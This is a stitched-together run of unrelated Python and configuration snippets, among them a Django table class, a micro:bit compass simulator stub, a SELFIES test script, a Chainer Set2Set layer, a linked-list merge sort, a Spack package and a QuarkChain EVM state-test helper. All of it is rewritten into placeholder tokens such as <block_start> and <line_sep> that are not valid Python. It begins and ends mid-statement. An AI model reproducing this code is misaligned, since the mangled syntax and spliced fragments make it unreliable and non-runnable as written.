_method_name='filter' parent_id=self._test_object_parent.pk)<line_sep>self.queryset_rebuilt=QuerysetParametersSerializer.rebuild(decomposed_queryset=decomposed_queryset)<line_sep>self._assertQuerysetEqual()<block_end><block_end> |
<import_from_stmt>django_tables2 TemplateColumn<import_from_stmt>service_catalog.models GlobalHook<import_from_stmt>Squest.utils.squest_table SquestTable<class_stmt>GlobalHookTable(SquestTable)<block_start>state=TemplateColumn(template_name='custom_columns/global_hook_state.html')<line_sep>actions=TemplateColumn(template_name='custom_columns/global_hook_actions.html' orderable=<false>)<class_stmt>Meta<block_start>model=GlobalHook<line_sep>attrs={"id":"global_hook_table" "class":"table squest-pagination-tables"}<line_sep>fields=("name" "model" "state" "job_template" "actions")<block_end><block_end> |
<import_from_stmt>common utils<import_from_stmt>common.telemetry telemetry_py<import_from_stmt>common.telemetry_events TelemetryEvent<class_stmt>Compass# The implementation is based off of https://microbit-micropython.readthedocs.io/en/v1.0.1/compass.html.
<block_start><def_stmt>calibrate self<block_start>"""
This function is not implemented in the simulator.
Starts the calibration process. When this function is called on the physical device, an instructive message will be scrolled to the user after which they will need to rotate the device in order to draw a circle on the LED display on the actual device.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.calibrate.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><def_stmt>is_calibrated self<block_start>"""
This function is not implemented in the simulator.
Returns ``True`` if the compass has been successfully calibrated, and
returns ``False`` otherwise.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.is_calibrated.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><def_stmt>clear_calibration self<block_start>"""
This function is not implemented in the simulator.
Undoes the calibration, making the compass uncalibrated again.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.clear_calibration.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><def_stmt>get_x self<block_start>"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``x`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.get_x.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><def_stmt>get_y self<block_start>"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``y`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.get_y.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><def_stmt>get_z self<block_start>"""
This function is not implemented in the simulator.
Gives the reading of the magnetic field strength on the ``z`` axis in nano
tesla, as a positive or negative integer, depending on the direction of the
field.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.get_z.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><def_stmt>heading self<block_start>"""
This function is not implemented in the simulator.
Gives the compass heading, calculated from the above readings, as an
integer in the range from 0 to 360, representing the angle in degrees,
clockwise, with north as 0.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.heading.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><def_stmt>get_field_strength self<block_start>"""
This function is not implemented in the simulator.
Returns an integer indication of the magnitude of the magnetic field around
the device in nano tesla.
"""<line_sep>utils.print_for_unimplemented_functions(Compass.get_field_strength.__name__)<line_sep>telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)<block_end><block_end> |
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
<def_stmt>f <block_start>(some_global):int<line_sep>print(some_global)<block_end># EXPECTED:
[<ellipsis> LOAD_CONST(Code((1 0))) LOAD_CONST('f') MAKE_FUNCTION(0) STORE_NAME('f') LOAD_CONST(<none>) RETURN_VALUE(0) CODE_START('f') ~LOAD_CONST('int') ]<line_sep> |
"""Script for testing selfies against large datasets.
"""<import_stmt>argparse<import_stmt>pathlib<import_stmt>pandas<as>pd<import_from_stmt>rdkit Chem<import_from_stmt>tqdm tqdm<import_stmt>selfies<as>sf<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--data_path" type=str default="version.smi.gz")<line_sep>parser.add_argument("--col_name" type=str default="isosmiles")<line_sep>parser.add_argument("--sep" type=str default=r"\s+")<line_sep>parser.add_argument("--start_from" type=int default=0)<line_sep>args=parser.parse_args()<line_sep>TEST_DIR=pathlib.Path(__file__).parent<line_sep>TEST_SET_PATH=TEST_DIR/"test_sets"/args.data_path<line_sep>ERROR_LOG_DIR=TEST_DIR/"error_logs"<line_sep>ERROR_LOG_DIR.mkdir(exist_ok=<true> parents=<true>)<def_stmt>make_reader <block_start><return>pd.read_csv(TEST_SET_PATH sep=args.sep chunksize=10000)<block_end><def_stmt>roundtrip_translation <block_start>sf.set_semantic_constraints("hypervalent")<line_sep>n_entries=0<for_stmt>chunk make_reader()<block_start>n_entries<augadd>len(chunk)<block_end>pbar=tqdm(total=n_entries)<line_sep>reader=make_reader()<line_sep>error_log=open(ERROR_LOG_DIR/f"{TEST_SET_PATH.stem}.txt" "a+")<line_sep>curr_idx=0<for_stmt>chunk_idx,chunk enumerate(reader)<block_start><for_stmt>in_smiles chunk[args.col_name]<block_start>pbar.update(1)<line_sep>curr_idx<augadd>1<if_stmt>curr_idx<l>args.start_from<block_start><continue><block_end>in_smiles=in_smiles.strip()<line_sep>mol=Chem.MolFromSmiles(in_smiles sanitize=<true>)<if_stmt>(mol<is><none>)<or>("*"<in>in_smiles)<block_start><continue><block_end><try_stmt><block_start>selfies=sf.encoder(in_smiles strict=<true>)<line_sep>out_smiles=sf.decoder(selfies)<block_end><except_stmt>(sf.EncoderError sf.DecoderError)<block_start>error_log.write(in_smiles+"\n")<line_sep>tqdm.write(in_smiles)<line_sep><continue><block_end><if_stmt><not>is_same_mol(in_smiles out_smiles)<block_start>error_log.write(in_smiles+"\n")<line_sep>tqdm.write(in_smiles)<block_end><block_end><block_end>error_log.close()<block_end><def_stmt>is_same_mol smiles1 smiles2<block_start><try_stmt><block_start>can_smiles1=Chem.CanonSmiles(smiles1)<line_sep>can_smiles2=Chem.CanonSmiles(smiles2)<line_sep><return>can_smiles1<eq>can_smiles2<block_end><except_stmt>Exception<block_start><return><false><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>roundtrip_translation()<block_end> |
<import_from_stmt>typing List Optional# NOQA
<import_stmt>chainer<import_from_stmt>chainer cuda<import_from_stmt>chainer functions<import_from_stmt>chainer links<import_stmt>numpy# NOQA
<class_stmt>Set2Set(chainer.Chain)<block_start>r"""MPNN subsubmodule for readout part.
See: <NAME>+, \
Order Matters: Sequence to sequence for sets. November 2015.
`arXiv:1511.06391 <https://arxiv.org/abs/1511.06391>`
Args:
in_channels (int): dimension of input feature vector
n_layers (int): number of LSTM layers
Returns (chainer.Variable):
Output feature vector: (minibatch, in_channels * 2)
"""<def_stmt>__init__ self in_channels n_layers=1# type: (int, int) -> None
<block_start>super(Set2Set self).__init__()<with_stmt>self.init_scope()<block_start>self.lstm_layer=links.NStepLSTM(n_layers=n_layers in_size=in_channels<times>2 out_size=in_channels dropout=0)<block_end>self.in_channels=in_channels<line_sep>self.n_layers=n_layers<line_sep>self.hx=<none># type: Optional[chainer.Variable]
self.cx=<none># type: Optional[chainer.Variable]
self.q_star=<none><block_end># type: Optional[List]
<def_stmt>__call__ self h# type: (chainer.Variable) -> chainer.Variable
<block_start>xp=cuda.get_array_module(h)<line_sep>mb,node,ch=h.shape# type: int, int, int
<if_stmt>self.q_star<is><none><block_start>self.q_star=[xp.zeros((1 self.in_channels<times>2)).astype('f')<for>_ range(mb)]<block_end>self.hx,self.cx,q=self.lstm_layer(self.hx self.cx self.q_star)<line_sep># self.hx: (mb, mb, ch)
# self.cx: (mb, mb, ch)
# q: List[(1, ch) * mb]
q=functions.stack(q)# q: (mb, 1, ch)
q_=functions.transpose(q axes=(0 2 1))# q_: (mb, ch, 1)
e=functions.matmul(h q_)# e: (mb, node, 1)
a=functions.softmax(e)# a: (mb, node, 1)
a=functions.broadcast_to(a h.shape)# a: (mb, node, ch)
r=functions.sum((a<times>h) axis=1 keepdims=<true>)# r: (mb, 1, ch)
q_star_=functions.concat((q r) axis=2)# q_star_: (mb, 1, ch*2)
self.q_star=functions.separate(q_star_)<line_sep><return>functions.reshape(q_star_ (mb ch<times>2))<block_end><def_stmt>reset_state self# type: () -> None
<block_start>self.hx=<none><line_sep>self.cx=<none><line_sep>self.q_star=<none><block_end><block_end> |
{"targets":[{"target_name":"index" "sources":["epoc.cc"] "include_dirs":["<!(node -e \"require('nan')\")"] "conditions":[['OS=="mac"' {"cflags":["-m64"] "ldflags":["-m64"] "xcode_settings":{"OTHER_CFLAGS":["-ObjC++"] "ARCHS":["x86_64"]} "link_settings":{"libraries":["/Library/Frameworks/edk.framework/edk"] "include_dirs":["./lib/includes/" "./lib/"]}}]]}]}<line_sep> |
# Fragment to switch off HCAL zero suppression as an option
# by cmsDriver customisation
# to generate Unsuppressed digis, one has to set the following parameter:
# process.simHcalDigis.useConfigZSvalues = 1
# to generate suppressed digis, useConfigZSvalues should be set to 0
<import_stmt>FWCore.ParameterSet.Config<as>cms<def_stmt>customise process# process.hcalDigiSequence.replace(process.simHcalDigis,cms.SequencePlaceholder("simHcalDigis"))
# process.load("SimCalorimetry.HcalZeroSuppressionProducers.hcalDigisNoSuppression_cfi")
<block_start>process.simHcalDigis.HBlevel=-999<line_sep>process.simHcalDigis.HElevel=-999<line_sep>process.simHcalDigis.HOlevel=-999<line_sep>process.simHcalDigis.HFlevel=-999<line_sep>process.simHcalDigis.useConfigZSvalues=1<line_sep><return>(process)<block_end> |
<import_stmt>unittest time sys<line_sep># not needed, but in case you move it down to subdir
sys.path.extend(['.' '..' '../..' 'py'])<import_stmt>h2o h2o_cmd h2o_import<as>h2i<import_stmt>h2o_browse<as>h2b<class_stmt>Basic(unittest.TestCase)<block_start><def_stmt>tearDown self<block_start>h2o.check_sandbox_for_errors()<block_end>@classmethod<def_stmt>setUpClass cls<block_start>h2o.init()<block_end>@classmethod<def_stmt>tearDownClass cls<block_start>h2o.tear_down_cloud()<block_end><def_stmt>test_fail1_100x1100 self<block_start>parseResult=h2i.import_parse(bucket='smalldata' path='fail1_100x11000.csv.gz' schema='put' timeoutSecs=60 retryDelaySecs=0.15)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>h2o.unit_main()<block_end> |
<import_from_stmt>dataclasses dataclass<import_from_stmt>reinvent_scoring.scoring.diversity_filters.reinvent_core.diversity_filter_parameters DiversityFilterParameters<import_from_stmt>reinvent_scoring.scoring.scoring_function_parameters ScoringFunctionParameters<import_from_stmt>running_modes.configurations.reinforcement_learning.inception_configuration InceptionConfiguration<import_from_stmt>running_modes.configurations.reinforcement_learning.reinforcement_learning_configuration ReinforcementLearningConfiguration<line_sep>@dataclass<class_stmt>ReinforcementLearningComponents<block_start>"""This class holds the necessary configuration components to run RL"""<line_sep>reinforcement_learning:ReinforcementLearningConfiguration<line_sep>scoring_function:ScoringFunctionParameters<line_sep>diversity_filter:DiversityFilterParameters<line_sep>inception:InceptionConfiguration<block_end> |
"""
.. _howto_perroundmaxchannel:
Decoding Spots with :py:class:`.PerRoundMaxChannel`
===================================================
:py:class:`.PerRoundMaxChannel` is a :py:class:`.DecodeSpotsAlgorithm` that picks the channel with
maximum signal intensity for each round to construct a barcode and then matches the barcode to
:term:`codewords <Codeword>` in the :term:`codebook <Codebook>`. It is important to
:ref:`normalize<section_normalizing_intensities>` the images prior to
:py:class:`.PerRoundMaxChannel` if the channels have significant differences in range of
intensity values. The returned :py:class:`.DecodedIntensityTable` has a ``distance`` field that
is a decoding quality score. :term:`Spots traces <Feature (Spot, Pixel) Trace>` with higher signal
in non-max channels have a greater ``distance`` value reflecting lower confidence in the decoded
:term:`target <Target>`.
:py:class:`.PerRoundMaxChannel` can be used for linearly multiplexed and one hot multiplexed
:term:`codebooks <Codebook>`. Linearly multiplexed assays (e.g. osmFISH, sequential
smFISH, and RNAscope) can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.SEQUENTIAL``. One hot multiplexed assays (e.g.
in situ sequencing, seqFISH, and STARmap) are termed 'one hot' because every round has exactly one
hot channel. They can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH`` or
``trace_building_strategy=TraceBuildingStrategies.NEAREST_NEIGHBORS``. The example below
demonstrates the recommended method for decoding one hot multiplexed
data using :py:class:`.PerRoundMaxChannel`.
"""<line_sep># Load in situ sequencing experiment and find spots
<import_from_stmt>starfish.image ApplyTransform LearnTransform Filter<import_from_stmt>starfish.types Axes TraceBuildingStrategies<import_from_stmt>starfish data FieldOfView<import_from_stmt>starfish.spots FindSpots<line_sep>experiment=data.ISS()<line_sep>fov=experiment.fov()<line_sep>imgs=fov.get_image(FieldOfView.PRIMARY_IMAGES)# primary images
dots=fov.get_image("dots")# reference round for image registration
# filter raw data
masking_radius=15<line_sep>filt=Filter.WhiteTophat(masking_radius is_volume=<false>)<line_sep>filt.run(imgs in_place=<true>)<line_sep>filt.run(dots in_place=<true>)<line_sep># register primary images to reference round
learn_translation=LearnTransform.Translation(reference_stack=dots axes=Axes.ROUND upsampling=1000)<line_sep>transforms_list=learn_translation.run(imgs.reduce({Axes.CH Axes.ZPLANE} func="max"))<line_sep>warp=ApplyTransform.Warp()<line_sep>warp.run(imgs transforms_list=transforms_list in_place=<true>)<line_sep># run blob detector on dots (reference image with every spot)
bd=FindSpots.BlobDetector(min_sigma=1 max_sigma=10 num_sigma=30 threshold=0.01 measurement_type='mean' )<line_sep>dots_max=dots.reduce((Axes.ROUND Axes.ZPLANE) func="max")<line_sep>spots=bd.run(image_stack=imgs reference_image=dots_max)<line_sep># Decode spots with PerRoundMaxChannel
<import_from_stmt>starfish.spots DecodeSpots<line_sep>decoder=DecodeSpots.PerRoundMaxChannel(codebook=experiment.codebook trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH)<line_sep>decoded_intensities=decoder.run(spots=spots)<line_sep> |
'''
Write a function sumprimes(l) that takes as input a list of integers l and retuns the sum of all the prime numbers in l.
Here are some examples to show how your function should work.
>>> sumprimes([3,3,1,13])
19
'''<def_stmt>sumprimes l<block_start>prime_sum=int()<for_stmt>num l<block_start><if_stmt>is_prime(num)<block_start>prime_sum=prime_sum+num<block_end><block_end><return>prime_sum<block_end><def_stmt>is_prime n<block_start>factor_list=[]<for_stmt>num range(2 n+1)<block_start><if_stmt>n%num<eq>0<block_start>factor_list=factor_list+[num]<block_end><block_end><return>len(factor_list)<eq>1<block_end> |
#Program for merge sort in linked list
<class_stmt>Node<block_start><def_stmt>__init__ self data<block_start>self.data=data<line_sep>self.next=<none><block_end><block_end><class_stmt>LinkedList<block_start><def_stmt>__init__ self<block_start>self.head=<none><block_end><def_stmt>append self new_value<block_start>new_node=Node(new_value)<if_stmt>self.head<is><none><block_start>self.head=new_node<line_sep><return><block_end>curr_node=self.head<while_stmt>curr_node.next<is><not><none><block_start>curr_node=curr_node.next<block_end>curr_node.next=new_node<block_end><def_stmt>sortedMerge self a b<block_start>result=<none><line_sep># Base cases
<if_stmt>a<eq><none><block_start><return>b<block_end><if_stmt>b<eq><none><block_start><return>a<block_end><if_stmt>a.data<le>b.data<block_start>result=a<line_sep>result.next=self.sortedMerge(a.next b)<block_end><else_stmt><block_start>result=b<line_sep>result.next=self.sortedMerge(a b.next)<block_end><return>result<block_end>#function for merge sort
<def_stmt>mergeSort self h<block_start><if_stmt>h<eq><none><or>h.next<eq><none><block_start><return>h<block_end># get the middle of the list
middle=self.getMiddle(h)<line_sep>nexttomiddle=middle.next<line_sep># set the next of middle node to None
middle.next=<none><line_sep># Apply mergeSort on left list
left=self.mergeSort(h)<line_sep># Apply mergeSort on right list
right=self.mergeSort(nexttomiddle)<line_sep># Merge the left and right lists
sortedlist=self.sortedMerge(left right)<line_sep><return>sortedlist<block_end>#get middle element from the linked list
<def_stmt>getMiddle self head<block_start><if_stmt>(head<eq><none>)<block_start><return>head<block_end>slow=head<line_sep>fast=head<while_stmt>(fast.next<ne><none><and>fast.next.next<ne><none>)<block_start>slow=slow.next<line_sep>fast=fast.next.next<block_end><return>slow<block_end><block_end><def_stmt>printList head<block_start><if_stmt>head<is><none><block_start>print(' ')<line_sep><return><block_end>curr_node=head<while_stmt>curr_node<block_start>print(curr_node.data end=" ")<line_sep>curr_node=curr_node.next<block_end>print(' ')<block_end># Main Code
<if_stmt>__name__<eq>'__main__'<block_start>li=LinkedList()<line_sep>li.append(67)<line_sep>li.append(98)<line_sep>li.append(45)<line_sep>li.append(12)<line_sep>li.append(43)<line_sep>li.append(17)<line_sep># Apply merge Sort
li.head=li.mergeSort(li.head)<line_sep>print("Sorted Linked List is:")<line_sep>printList(li.head)<block_end> |
<import_from_stmt>accessify accessify private<line_sep>@accessify<class_stmt>Car<block_start>@private<def_stmt>start_engine self<block_start><return>'Engine sound.'<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>car=Car()<assert_stmt>'start_engine'<not><in>dir(car)<block_end> |
<import_from_stmt>libcloud.container.types Provider<import_from_stmt>libcloud.container.providers get_driver<line_sep>driver=get_driver(Provider.RANCHER)<line_sep>connection=driver("MYRANCHERACCESSKEY" "MYRANCHERSECRETKEY" host="172.30.22.1" port=8080 secure=<false>)<line_sep>search_results=connection.ex_search_containers(search_params={"imageUuid":"docker:mysql" "state":"running"})<line_sep>id_of_first_result=search_results[0]['id']<line_sep> |
<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_stmt>pytest<import_from_stmt>sklearn.linear_model LinearRegression<import_from_stmt>sklearn.linear_model TheilSenRegressor<import_from_stmt>etna.analysis get_residuals<import_from_stmt>etna.analysis plot_residuals<import_from_stmt>etna.analysis plot_trend<import_from_stmt>etna.analysis.plotters _get_labels_names<import_from_stmt>etna.datasets TSDataset<import_from_stmt>etna.metrics MAE<import_from_stmt>etna.models LinearPerSegmentModel<import_from_stmt>etna.pipeline Pipeline<import_from_stmt>etna.transforms BinsegTrendTransform<import_from_stmt>etna.transforms LagTransform<import_from_stmt>etna.transforms LinearTrendTransform<import_from_stmt>etna.transforms STLTransform<import_from_stmt>etna.transforms TheilSenTrendTransform<line_sep>@pytest.fixture<def_stmt>residuals <block_start>timestamp=pd.date_range("2020-01-01" periods=100 freq="D")<line_sep>df=pd.DataFrame({"timestamp":timestamp.tolist()<times>2 "segment":["segment_0"]<times>len(timestamp)+["segment_1"]<times>len(timestamp) "target":np.arange(len(timestamp)).tolist()+(np.arange(len(timestamp))+1).tolist() })<line_sep>df_wide=TSDataset.to_dataset(df)<line_sep>ts=TSDataset(df=df_wide freq="D")<line_sep>forecast_df=ts[timestamp[10:] : :]<line_sep>forecast_df.loc[: pd.IndexSlice["segment_0" "target"]]=-1<line_sep>forecast_df.loc[: pd.IndexSlice["segment_1" "target"]]=1<line_sep>residuals_df=ts[timestamp[10:] : :]<line_sep>residuals_df.loc[: pd.IndexSlice["segment_0" "target"]]<augadd>1<line_sep>residuals_df.loc[: pd.IndexSlice["segment_1" "target"]]<augsub>1<line_sep><return>residuals_df forecast_df ts<block_end><def_stmt>test_get_residuals residuals<block_start>"""Test that get_residuals finds residuals correctly."""<line_sep>residuals_df,forecast_df,ts=residuals<line_sep>actual_residuals=get_residuals(forecast_df=forecast_df ts=ts)<assert_stmt>actual_residuals.to_pandas().equals(residuals_df)<block_end><def_stmt>test_get_residuals_not_matching_lengths residuals<block_start>"""Test that get_residuals fails to find residuals correctly if ts hasn't answers."""<line_sep>residuals_df,forecast_df,ts=residuals<line_sep>ts=TSDataset(df=ts[ts.index[:-10] : :] freq="D")<with_stmt>pytest.raises(KeyError)<block_start>_=get_residuals(forecast_df=forecast_df ts=ts)<block_end><block_end><def_stmt>test_get_residuals_not_matching_segments residuals<block_start>"""Test that get_residuals fails to find residuals correctly if segments of dataset and forecast differ."""<line_sep>residuals_df,forecast_df,ts=residuals<line_sep>columns_frame=forecast_df.columns.to_frame()<line_sep>columns_frame["segment"]=["segment_0" "segment_3"]<line_sep>forecast_df.columns=pd.MultiIndex.from_frame(columns_frame)<with_stmt>pytest.raises(KeyError match="Segments of `ts` and `forecast_df` should be the same")<block_start>_=get_residuals(forecast_df=forecast_df ts=ts)<block_end><block_end><def_stmt>test_plot_residuals_fails_unkown_feature example_tsdf<block_start>"""Test that plot_residuals fails if meet unknown feature."""<line_sep>pipeline=Pipeline(model=LinearPerSegmentModel() transforms=[LagTransform(in_column="target" lags=[5 6 7])] horizon=5)<line_sep>metrics,forecast_df,info=pipeline.backtest(ts=example_tsdf metrics=[MAE()] n_folds=3)<with_stmt>pytest.raises(ValueError match="Given feature isn't present in the dataset")<block_start>plot_residuals(forecast_df=forecast_df ts=example_tsdf feature="unkown_feature")<block_end><block_end>@pytest.mark.parametrize("poly_degree, trend_transform_class" ([1 LinearTrendTransform] [2 LinearTrendTransform] [1 TheilSenTrendTransform] [2 TheilSenTrendTransform] ) )<def_stmt>test_plot_trend poly_degree example_tsdf trend_transform_class<block_start>plot_trend(ts=example_tsdf trend_transform=trend_transform_class(in_column="target" poly_degree=poly_degree))<block_end>@pytest.mark.parametrize("detrend_model" (TheilSenRegressor() LinearRegression()))<def_stmt>test_plot_bin_seg example_tsdf detrend_model<block_start>plot_trend(ts=example_tsdf trend_transform=BinsegTrendTransform(in_column="target" detrend_model=detrend_model))<block_end>@pytest.mark.parametrize("period" (7 30))<def_stmt>test_plot_stl example_tsdf period<block_start>plot_trend(ts=example_tsdf trend_transform=STLTransform(in_column="target" period=period))<block_end>@pytest.mark.parametrize("poly_degree, expect_values, trend_class" ([1 <true> LinearTrendTransform] [2 <false> LinearTrendTransform] [1 <true> TheilSenTrendTransform] [2 <false> TheilSenTrendTransform] ) )<def_stmt>test_get_labels_names_linear_coeffs example_tsdf poly_degree expect_values trend_class<block_start>ln_tr=trend_class(in_column="target" poly_degree=poly_degree)<line_sep>example_tsdf.fit_transform([ln_tr])<line_sep>segments=example_tsdf.segments<line_sep>_,linear_coeffs=_get_labels_names([ln_tr] segments)<if_stmt>expect_values<block_start><assert_stmt>list(linear_coeffs.values())<ne>["" ""]<block_end><else_stmt><block_start><assert_stmt>list(linear_coeffs.values())<eq>["" ""]<block_end><block_end> |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
<import_stmt>glob<import_stmt>os<import_stmt>zipfile<import_from_stmt>spack *<class_stmt>PyFlitCore(PythonPackage)<block_start>"""Distribution-building parts of Flit."""<line_sep>homepage="https://github.com/takluyver/flit"<line_sep>url="https://github.com/takluyver/flit/archive/refs/tags/3.3.0.tar.gz"<line_sep>maintainers=['takluyver']<line_sep>version('3.3.0' sha256='f5340b268563dd408bf8e2df6dbc8d4d08bc76cdff0d8c7f8a4be94e5f01f22f')<line_sep>depends_on('python@3.4:' type=('build' 'run'))<line_sep>depends_on('py-toml' type=('build' 'run'))<def_stmt>build self spec prefix<block_start><with_stmt>working_dir('flit_core')<block_start>python('build_dists.py')<block_end><block_end><def_stmt>install self spec prefix<block_start>wheel=glob.glob(os.path.join('flit_core' 'dist' '*.whl'))[0]<with_stmt>zipfile.ZipFile(wheel)<as>f<block_start>f.extractall(python_purelib)<block_end><block_end><block_end> |
<import_stmt>grpc<import_stmt>snippets_pb2<import_stmt>snippets_pb2_grpc<import_from_stmt>google.protobuf.struct_pb2 NullValue<with_stmt>grpc.insecure_channel('localhost:50051')<as>channel<block_start>stub=snippets_pb2_grpc.SnippetControllerStub(channel)<line_sep>request=snippets_pb2.Snippet(id=1 title='snippet title')<line_sep># send non-null value
# request.language.value = "python"
# send null value
request.language.null=NullValue.NULL_VALUE<line_sep>response=stub.Update(request)<line_sep>print(response end='')<block_end> |
# Service info
APP="vertica"<line_sep> |
<import_stmt>sys<import_from_stmt>quarkchain.evm.state State<import_from_stmt>quarkchain.evm.common FakeHeader<import_from_stmt>quarkchain.evm.utils decode_hex parse_int_or_hex sha3 to_string remove_0x_head encode_hex big_endian_to_int <import_from_stmt>quarkchain.evm.config default_config Env<import_from_stmt>quarkchain.config get_default_evm_config<import_from_stmt>quarkchain.evm.exceptions InvalidTransaction<import_stmt>quarkchain.evm.transactions<as>transactions<import_from_stmt>quarkchain.evm.messages apply_transaction<import_from_stmt>quarkchain.evm.specials specials configure_special_contract_ts<import_stmt>copy<import_stmt>os<import_from_stmt>quarkchain.db InMemoryDb<import_from_stmt>quarkchain.utils token_id_encode<line_sep>config_string=":info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug"<line_sep>konfig=copy.copy(default_config)<line_sep># configure_logging(config_string=config_string)
fixture_path=os.path.join(os.path.dirname(__file__) "../.." "fixtures")<line_sep>fake_headers={}<def_stmt>mk_fake_header blknum<block_start><if_stmt>blknum<not><in>fake_headers<block_start>fake_headers[blknum]=FakeHeader(sha3(to_string(blknum)))<block_end><return>fake_headers[blknum]<block_end>basic_env={"currentCoinbase":"0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba" "currentDifficulty":"0x020000" "currentGasLimit":"0x7fffffffffffffff" "currentNumber":"0x01" "currentTimestamp":"0x03e8" "previousHash":"0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6" }<line_sep>evm_config=get_default_evm_config()<line_sep>network_to_test={"ConstantinopleFix"}<line_sep># Makes a diff between a prev and post state
<def_stmt>mk_state_diff prev post<block_start>o={}<for_stmt>k prev.keys()<block_start><if_stmt>k<not><in>post<block_start>o[k]=["-" prev[k]]<block_end><block_end><for_stmt>k post.keys()<block_start><if_stmt>k<not><in>prev<block_start>o[k]=["+" post[k]]<block_end><elif_stmt>prev[k]<ne>post[k]<block_start>ok={}<for_stmt>key ("nonce" "token_balances" "code")<block_start><if_stmt>prev[k][key]<ne>post[k][key]<block_start>ok[key]=[prev[k][key] "->" post[k][key]]<block_end><block_end><if_stmt>prev[k]["storage"]<ne>post[k]["storage"]<block_start>ok["storage"]={}<for_stmt>sk prev[k]["storage"].keys()<block_start><if_stmt>sk<not><in>post[k]["storage"]<block_start>ok["storage"][sk]=["-" prev[k]["storage"][sk]]<block_end><block_end><for_stmt>sk post[k]["storage"].keys()<block_start><if_stmt>sk<not><in>prev[k]["storage"]<block_start>ok["storage"][sk]=["+" post[k]["storage"][sk]]<block_end><else_stmt><block_start>ok["storage"][sk]=[prev[k]["storage"][sk] "->" post[k]["storage"][sk] ]<block_end><block_end><block_end>o[k]=ok<block_end><block_end><return>o<block_end># Compute a single unit of a state test
<def_stmt>compute_state_test_unit state txdata indices konfig is_qkc_state qkc_env=<none><block_start>state.env.config=konfig<line_sep>s=state.snapshot()<if_stmt>"transferTokenId"<in>txdata<block_start>transfer_token_id=parse_int_or_hex(txdata["transferTokenId"][indices["transferTokenId"]])<block_end><else_stmt><block_start>transfer_token_id=token_id_encode("QKC")<block_end><try_stmt># Create the transaction
<block_start>tx=transactions.Transaction(nonce=parse_int_or_hex(txdata["nonce"]<or>b"0") gasprice=parse_int_or_hex(txdata["gasPrice"]<or>b"0") startgas=parse_int_or_hex(txdata["gasLimit"][indices["gas"]]<or>b"0") to=decode_hex(remove_0x_head(txdata["to"])) value=parse_int_or_hex(txdata["value"][indices["value"]]<or>b"0") data=decode_hex(remove_0x_head(txdata["data"][indices["data"]])) gas_token_id=token_id_encode("QKC") transfer_token_id=transfer_token_id # Should not set testing flag if testing QuarkChain state
is_testing=<not>is_qkc_state )<line_sep>tx.set_quark_chain_config(qkc_env.quark_chain_config)<if_stmt>"secretKey"<in>txdata<block_start>tx.sign(decode_hex(remove_0x_head(txdata["secretKey"])))<block_end><else_stmt><block_start>tx._in_mutable_context=<true><line_sep>tx.v=parse_int_or_hex(txdata["v"])<line_sep>tx._in_mutable_context=<false><block_end># Run it
prev=copy.deepcopy(state.to_dict())<line_sep>success,output=apply_transaction(state tx tx_wrapper_hash=bytes(32))<block_end><except_stmt>InvalidTransaction<as>e<block_start>print("Exception: %r"%e)<line_sep>success,output=<false> b""<block_end># touch coinbase, make behavior consistent with go-ethereum
state.delta_token_balance(state.block_coinbase token_id_encode("QKC") 0)<line_sep>state.commit()<line_sep>post=state.to_dict()<line_sep>output_decl={"hash":"0x"+encode_hex(state.trie.root_hash) "indexes":indices "diff":mk_state_diff(prev post) }<line_sep>state.revert(s)<line_sep><return>output_decl<block_end># Initialize the state for state tests
<def_stmt>init_state env pre is_qkc_state qkc_env=<none># Setup env
<block_start>db=InMemoryDb()<line_sep>state_env=Env(config=konfig)<line_sep>state_env.db=db<line_sep>state=State(env=state_env block_prevhash=decode_hex(remove_0x_head(env["previousHash"])) prev_headers=[mk_fake_header(i)<for>i range(parse_int_or_hex(env["currentNumber"])-1 max(-1 parse_int_or_hex(env["currentNumber"])-257) -1 )] block_number=parse_int_or_hex(env["currentNumber"]) block_coinbase=decode_hex(remove_0x_head(env["currentCoinbase"])) block_difficulty=parse_int_or_hex(env["currentDifficulty"]) gas_limit=parse_int_or_hex(env["currentGasLimit"]) timestamp=parse_int_or_hex(env["currentTimestamp"]) qkc_config=qkc_env.quark_chain_config # If testing QuarkChain states, should not use mock account
